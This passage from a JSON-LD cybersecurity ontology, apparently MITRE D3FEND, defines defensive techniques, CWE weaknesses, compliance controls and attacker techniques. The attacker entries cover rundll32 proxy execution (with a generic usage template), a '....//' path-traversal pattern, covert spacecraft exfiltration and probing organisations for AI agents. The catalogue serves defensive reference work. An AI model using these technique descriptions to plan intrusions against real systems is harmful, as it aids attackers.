      "d3f:d3fend-id": "D3-CR",
      "d3f:definition": "Deleting a set of credentials permanently to prevent them from being used to authenticate.",
      "d3f:deletes": {
        "@id": "d3f:Credential"
      },
      "d3f:kb-article": "## How it works\n\nManagement servers with enterprise policies for account management provide the ability to remove permissions, accounts, or credentials. Compromised credentials should be revoked to prevent further malicious activity.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-RevokingaPreviouslyIssuedVerifiableCredential-Microsoft"
      },
      "rdfs:label": "Credential Revocation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialEviction"
        },
        {
          "@id": "_:N41075e1b900945c4ac977d9f11a25312"
        }
      ]
    },
    {
      "@id": "_:N41075e1b900945c4ac977d9f11a25312",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:T0844",
      "@type": "owl:Class",
      "d3f:attack-id": "T0844",
      "d3f:definition": "Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. (Citation: Guidance - IEC61131) POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. (Citation: Guidance - IEC61131) Application - 201203 They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. (Citation: PLCBlaster - Spenneberg)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Program Organization Units - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSExecutionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSLateralMovementTechnique"
        }
      ],
      "skos:prefLabel": "Program Organization Units"
    },
    {
      "@id": "d3f:HostReboot",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:HostReboot"
      ],
      "d3f:d3fend-id": "D3-HR",
      "d3f:definition": "Initiating a host's reboot sequence to terminate all running processes.",
      "d3f:kb-article": "## How It Works\n\nHost reboot can either be initiated in the physical presence of the device using the power functions or remotely using the provided user interface or an installed EDR agent (with the available function). This process may allow for the removal of specific types of malware, such as fileless malware, and can also prevent further damage, for example, if the system is part of a botnet.\n\n## Considerations\n\n- If the attacker has established persistence, this technique may not be effective.\n- Compromised systems may not respond to remote commands to shut down or reboot, requiring physical intervention.\n- Shutting down a system will usually cause memory to lose its state, and that state can be useful in forensic activities, so this should be considered when deciding to shut down.\n- Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NearMemoryInMemoryDetectionofFilelessMalware"
      },
      "d3f:terminates": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Host Reboot",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HostShutdown"
        },
        {
          "@id": "_:N8378de4e19104ae7b12cf7a105a1fa6e"
        }
      ]
    },
    {
      "@id": "_:N8378de4e19104ae7b12cf7a105a1fa6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:terminates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:Restore",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The restore tactic is used to return the system to a better state.",
      "d3f:display-order": 5,
      "d3f:display-priority": 0,
      "rdfs:label": "Restore",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:T1196",
      "@type": "owl:Class",
      "d3f:attack-id": "T1196",
      "d3f:definition": "Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.002",
      "rdfs:label": "Control Panel Items",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:MemoryAllocationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the allocation of memory resources to a process, providing it with the capacity to store data or execute instructions.",
      "rdfs:label": "Memory Allocation Event",
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryEvent"
      }
    },
    {
      "@id": "d3f:Reference-TamperProofMutatingSoftware_ARXANTECHNOLOGIESInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9262600B2/en?oq=US9262600B2"
      },
      "d3f:kb-abstract": "System and method is disclosed for protecting client software running on a client computer from tampering using a secure server. Prior to or independent of executing the client software, the system integrates self-protection into the client software; removes functions from the client software for execution on the server; develops client software self-protection updates; and periodically distributes the updates. During execution of the client software, the system receives an initial request from the client computer for execution of the removed function; verifies the initial request; and cooperates with the client computer in execution of the client software if verification is successful. If verification is unsuccessful, the system can attempt to update the client software on the client computer; and require a new initial request. Client software can be updated on occurrence of a triggering event. Communications can be encrypted, and the encryption updated. Authenticating checksums can be used for verification.",
      "d3f:kb-author": "Kevin Dale Morgan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "ARXAN TECHNOLOGIES Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessCodeSegmentVerification"
      },
      "d3f:kb-reference-title": "Tamper proof mutating software",
      "rdfs:label": "Reference - Tamper proof mutating software - ARXAN TECHNOLOGIES Inc"
    },
    {
      "@id": "d3f:OSAPISaveRegisters",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that retrieves and saves the values of CPU registers for a specific process or thread.",
      "d3f:invokes": {
        "@id": "d3f:SaveRegister"
      },
      "rdfs:label": "OS API Save Registers",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N8776c085a11448cb84dddd55211d7230"
        }
      ]
    },
    {
      "@id": "_:N8776c085a11448cb84dddd55211d7230",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SaveRegister"
      }
    },
    {
      "@id": "d3f:ConvolutionalNeuralNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CNN",
      "d3f:definition": "A class of artificial neural network most commonly applied to analyze visual imagery. CNNs use a mathematical operation called convolution in place of general matrix multiplication in at least one of their layers.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Convolutional neural network. [Link](https://en.wikipedia.org/wiki/Convolutional_neural_network)",
      "rdfs:label": "Convolutional Neural Network",
      "rdfs:subClassOf": {
        "@id": "d3f:DeepNeuralNetClassification"
      }
    },
    {
      "@id": "d3f:CCI-000200_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prohibits password reuse for the organization-defined number of generations.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-22T00:00:00"
      },
      "rdfs:label": "CCI-000200"
    },
    {
      "@id": "d3f:SPARTADefenseEvasionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0006"
      },
      "rdfs:label": "Defense Evasion Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:N9130317a4b904a7a95df512689a0edce"
        }
      ],
      "skos:prefLabel": "Defense Evasion Technique"
    },
    {
      "@id": "_:N9130317a4b904a7a95df512689a0edce",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0006"
      }
    },
    {
      "@id": "d3f:ClockSynchronizationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a software clock adjusts its value based on an external time reference (e.g., NTP server, GPS time signal).",
      "rdfs:label": "Clock Synchronization Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwareClockEvent"
      }
    },
    {
      "@id": "d3f:ResamplingEnsemble",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RE",
      "d3f:definition": "In the method, the small classes are oversampled and large classes are undersampled. The resampling scale is determined by the ratio of the min class number and max class number. And multiple machine learning methods are selected to construct the ensemble",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia. [Link](https://en.wikipedia.org/wiki/Ensemble_learning).\n\nTorgo, L. (2014). A resampling ensemble algorithm for improved accuracy. *Neurocomputing*, 134, 55-66.  [Link](https://www.sciencedirect.com/science/article/pii/S0925231214007644#:~:text=A%20resampling%20ensemble%20algorithm%20is,and%20undersampling%20are%20empirically%20analyzed).",
      "rdfs:label": "Resampling Ensemble",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:CWE-695",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-695",
      "d3f:definition": "The product uses low-level functionality that is explicitly prohibited by the framework or specification under which the product is supposed to operate.",
      "rdfs:label": "Use of Low-Level Functionality",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:SSHConnectionResetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating the abrupt termination of an SSH connection due to protocol errors, network disruptions, or administrative actions.",
      "rdfs:label": "SSH Connection Reset Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionResetEvent"
        },
        {
          "@id": "d3f:SSHEvent"
        },
        {
          "@id": "_:N8300b58609604be7b49cdd87fdbb9da6"
        }
      ]
    },
    {
      "@id": "_:N8300b58609604be7b49cdd87fdbb9da6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SSHConnectionOpenEvent"
      }
    },
    {
      "@id": "d3f:ProcessorRegister",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contained-by": {
        "@id": "d3f:CentralProcessingUnit"
      },
      "d3f:definition": "A processor register is a quickly accessible location available to a computer's processor. Registers usually consist of a small amount of fast storage, although some registers have specific hardware functions, and may be read-only or write-only.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Processor_register"
      },
      "rdfs:label": "Processor Register",
      "rdfs:seeAlso": {
        "@id": "https://www.techtarget.com/whatis/definition/register"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PrimaryStorage"
        },
        {
          "@id": "_:Nc16d0eeb0b0a4a60beb5dea213853afc"
        }
      ]
    },
    {
      "@id": "_:Nc16d0eeb0b0a4a60beb5dea213853afc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contained-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CentralProcessingUnit"
      }
    },
    {
      "@id": "d3f:Reference-PostSandboxMethodsAndSystemsForDetectingAndBlockingZero-dayExploitsViaApiCallValidation_K2CyberSecurityInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190138715A1/"
      },
      "d3f:kb-abstract": "In one aspect, a method useful for monitoring and validating execution of executable binary code, includes the step of disassembling an executable binary code of an application. The method includes the step of detecting and obtaining location and type of an application programming interface (API) call, system call, and privileged instruction that is executed by the executable binary code. The method includes the step of detecting and obtaining return address from an API call and system call. The method includes the step of validating location of the API call, system call, and privileged instruction. The method includes the step of validating return from the API call and system call.",
      "d3f:kb-author": "Jayant Shukla",
      "d3f:kb-mitre-analysis": "The patent describes a technique for monitoring API calls. Executable binary code of an application is first disassembled and scanned for API calls. Based on the recorded API calls, a rule list is generated. Software hooks are placed in the code for monitoring API calls during program execution and then each API call is validated using the generated rule list to permit or deny execution of API calls.\n\nRules are created that specify the type and location of the API call. For example, data collected for an application can show an API call to libc at address 0x43e0 and an API call by libc at address 0xlfb47. Accordingly, two rules are generated. The first rule specifies the location type and target of the API call at address 0x43e0, as well as the return address. The second rule is for the API call to the kernel and states the target address, return address, instruction, and target type.",
      "d3f:kb-organization": "K2 Cyber Security Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "Post sandbox methods and systems for detecting and blocking zero-day exploits via api call validation",
      "rdfs:label": "Reference - Post sandbox methods and systems for detecting and blocking zero-day exploits via api call validation - K2 Cyber Security Inc"
    },
    {
      "@id": "d3f:CWE-242",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-242",
      "d3f:definition": "The product calls a function that can never be guaranteed to work safely.",
      "rdfs:label": "Use of Inherently Dangerous Function",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1177"
      }
    },
    {
      "@id": "d3f:Subroutine",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In different programming languages, a subroutine may be called a procedure, a function, a routine, a method, or a subprogram. The generic term callable unit is sometimes used.",
      "d3f:synonym": [
        "Method",
        "Semantic Subroutine",
        "Software Function"
      ],
      "rdfs:label": "Subroutine",
      "rdfs:seeAlso": {
        "@id": "dbr:Subroutine"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:may-add",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-add y: The entity x may add the thing y; that is, 'x adds y' may be true.",
      "rdfs:label": "may-add",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:identifier",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": {
        "@language": "en",
        "@value": "identifier"
      },
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:TA0042",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to establish resources they can use to support operations.\n\nResource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.",
      "d3f:display-order": 0,
      "rdfs:label": "Resource Development",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:CWE-34",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-34",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '....//' (doubled dot dot slash) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '....//'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:SafeMode",
      "@type": "owl:Class",
      "d3f:definition": "An intentionally constrained operating mode of a system in which nonessential functions are disabled or limited and control is shifted to a minimal, well-tested configuration that prioritizes preventing harm (to the system, its environment, or data), maintaining basic stability and monitoring, and enabling diagnosis and recovery back to normal operation.",
      "rdfs:label": "Safe Mode",
      "rdfs:seeAlso": {
        "@id": "dbr:Safe_mode"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "d3f:UnsupervisedPreprocessing",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-UP",
      "d3f:definition": "When performing unsupervised learning, the machine is presented with unlabeled data. (Unlabeled data has no target.) Unsupervised learning algorithms seek to discover intrinsic patterns that underlie the data, such as a clustering parameter or a redundant parameter (dimension) that can be reduced.",
      "d3f:kb-article": "## References\nSAS Institute Inc. (n.d.). Decision Trees. In SAS® Visual Data Mining and Machine Learning.[Link](https://documentation.sas.com/doc/en/vdmmlcdc/8.4/vdmmladvug/n1e4spzcnv1f0fn1vsxhbzgdp1bb.htm).",
      "rdfs:label": "Unsupervised Preprocessing",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-SupervisedLearning"
      }
    },
    {
      "@id": "d3f:Pipe",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In Unix-like computer operating systems, a pipeline is a mechanism for inter-process communication using message passing.  In the strictest sense, a pipe is a single segment of a pipeline, allowing one process to pass information forward to another.  Network pipes allow processes on different hosts to interact.",
      "rdfs:isDefinedBy": {
        "@id": "http://www.linfo.org/pipe.html"
      },
      "rdfs:label": "Pipe",
      "rdfs:seeAlso": {
        "@id": "dbr:Pipeline_(Unix)"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "Pipeline"
    },
    {
      "@id": "d3f:has-member",
      "@type": "owl:ObjectProperty",
      "owl:inverseOf": {
        "@id": "d3f:member-of"
      },
      "rdfs:label": "has-member",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-object-property"
      }
    },
    {
      "@id": "d3f:EXF-0006",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0006",
      "d3f:definition": "The adversary alters radio/optical link configuration so the spacecraft emits mission data over paths the program does not monitor or control. Levers include retuning carriers, adding sidebands or subcarriers, changing modulation/coding profiles, remapping virtual channels/APIDs, editing beacon content, or redirecting routing tables in regenerative payloads. Data can be embedded steganographically (idle fields, padding, frame counters, pilot tones) or carried on a covert auxiliary downlink/crosslink pointed at attacker-owned apertures. Because these emissions conform to plausible waveforms and scheduler behavior, they appear as ordinary link activity while quietly conveying payload products, housekeeping, or file fragments to non-mission receivers.",
      "rdfs:label": "Modify Communications Configuration - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0006/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Modify Communications Configuration"
    },
    {
      "@id": "d3f:T0883",
      "@type": "owl:Class",
      "d3f:attack-id": "T0883",
      "d3f:definition": "Adversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through [External Remote Services](https://attack.mitre.org/techniques/T0822). Internet Accessible Devices are exposed to the internet unintentionally or intentionally without adequate protections. This may allow for adversaries to move directly into the control system network. Access onto these devices is accomplished without the use of exploits, these would be represented within the [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T0819) technique.",
      "rdfs:label": "Internet Accessible Device - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Internet Accessible Device"
    },
    {
      "@id": "d3f:T1662",
      "@type": "owl:Class",
      "d3f:attack-id": "T1662",
      "d3f:definition": "Adversaries may destroy data and files on specific devices or in large numbers to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.",
      "rdfs:label": "Data Destruction - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Data Destruction"
    },
    {
      "@id": "d3f:AML.T0006",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0006",
      "d3f:definition": "An adversary may probe or scan the victim system to gather information for targeting. This is distinct from other reconnaissance techniques that do not involve direct interaction with the victim system.\n\nAdversaries may scan for open ports on a potential victim's network, which can indicate specific services or tools the victim is utilizing. This could include a scan for tools related to AI DevOps or AI services themselves such as public AI chat agents (ex: [Copilot Studio Hunter](https://github.com/mbrg/power-pwn/wiki/Modules:-Copilot-Studio-Hunter-%E2%80%90-Enum)). They can also send emails to organization service addresses and inspect the replies for indicators that an AI agent is managing the inbox.\n\nInformation gained from Active Scanning may yield targets that provide opportunities for other forms of reconnaissance such as [Search Open Technical Databases](/techniques/AML.T0000), [Search Open AI Vulnerability Analysis](/techniques/AML.T0001), or [Gather RAG-Indexed Targets](/techniques/AML.T0064).",
      "rdfs:label": "Active Scanning - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0006"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Active Scanning"
    },
    {
      "@id": "d3f:T1218.011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.011",
      "d3f:definition": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:loads": {
        "@id": "d3f:SharedLibraryFile"
      },
      "rdfs:label": "Rundll32",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:N00a50369174d4cc49bfb2b3c5e14f393"
        },
        {
          "@id": "_:N3e4621fb953b4651aec1ae66d430be16"
        }
      ]
    },
    {
      "@id": "_:N00a50369174d4cc49bfb2b3c5e14f393",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N3e4621fb953b4651aec1ae66d430be16",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:CWE-406",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-406",
      "d3f:definition": "The product does not sufficiently monitor or control transmitted network traffic volume, so that an actor can cause the product to transmit more traffic than should be allowed for that actor.",
      "rdfs:label": "Insufficient Control of Network Message Volume (Network Amplification)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:CCI-001686_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system notifies organization-defined personnel or roles for account removal actions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2011-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001686"
    },
    {
      "@id": "d3f:procedure-1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Procedure"
      ],
      "d3f:implements": {
        "@id": "d3f:T1134.001"
      },
      "d3f:start": {
        "@id": "d3f:step-1"
      },
      "rdfs:label": "Procedure 1 - T1134.001 Access Token Manipulation"
    },
    {
      "@id": "d3f:T1565.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1565.002",
      "d3f:definition": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.",
      "d3f:may-modify": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Transmitted Data Manipulation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1565"
        },
        {
          "@id": "_:Nde31ab37b8664193995781c6cfaf96cb"
        }
      ]
    },
    {
      "@id": "_:Nde31ab37b8664193995781c6cfaf96cb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:SMBFileOpenIfEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is opened if it exists, or created if it does not. This operation merges file creation and access behavior.",
      "rdfs:label": "SMB File Open If Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SMBEvent"
      }
    },
    {
      "@id": "d3f:CWE-636",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-636",
      "d3f:definition": "When the product encounters an error condition or failure, its design requires it to fall back to a state that is less secure than other options that are available, such as selecting the weakest encryption algorithm or using the most permissive access control restrictions.",
      "d3f:synonym": "Failing Open",
      "rdfs:label": "Not Failing Securely ('Failing Open')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-657"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:CWE-12",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-12",
      "d3f:definition": "An ASP.NET application must enable custom error pages in order to prevent attackers from mining information from the framework's built-in responses.",
      "rdfs:label": "ASP.NET Misconfiguration: Missing Custom Error Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-756"
      }
    },
    {
      "@id": "d3f:expectation-rating",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": "expectation-rating",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-3_11",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Enforcement | Restrict Access to Specific Information Types",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-3(11)"
    },
    {
      "@id": "d3f:CWE-140",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-140",
      "d3f:definition": "The product does not neutralize or incorrectly neutralizes delimiters.",
      "rdfs:label": "Improper Neutralization of Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:CWE-1310",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1310",
      "d3f:definition": "Missing an ability to patch ROM code may leave a System or System-on-Chip (SoC) in a vulnerable state.",
      "rdfs:label": "Missing Ability to Patch ROM Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1329"
      }
    },
    {
      "@id": "d3f:T1564.012",
      "@type": "owl:Class",
      "d3f:attack-id": "T1564.012",
      "d3f:definition": "Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)",
      "rdfs:label": "File/Path Exclusions",
      "rdfs:subClassOf": {
        "@id": "d3f:T1564"
      }
    },
    {
      "@id": "d3f:CWE-403",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-403",
      "d3f:definition": "A process does not close sensitive file descriptors before invoking a child process, which allows the child to perform unauthorized I/O operations using those descriptors.",
      "d3f:synonym": "File descriptor leak",
      "rdfs:label": "Exposure of File Descriptor to Unintended Control Sphere ('File Descriptor Leak')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-402"
      }
    },
    {
      "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to prevent your safety, protection, quality assurance, and operator intervention functions from responding to a failure, hazard, or unsafe state.",
      "d3f:enables": {
        "@id": "d3f:TA0107"
      },
      "rdfs:label": "Inhibit Response Function Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:Nf520c5919fd04515863d486f502762e5"
        }
      ],
      "skos:prefLabel": "Inhibit Response Function Technique"
    },
    {
      "@id": "_:Nf520c5919fd04515863d486f502762e5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0107"
      }
    },
    {
      "@id": "d3f:HardwareCryptographicModule",
      "@type": "owl:Class"
    },
    {
      "@id": "d3f:Reference-PsSuspend",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend"
      },
      "d3f:kb-author": "Mark Russinovich",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSuspension"
      },
      "d3f:kb-reference-title": "PsSuspend",
      "rdfs:label": "Reference - PsSuspend - Microsoft"
    },
    {
      "@id": "d3f:TemporalDifferenceLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TDL",
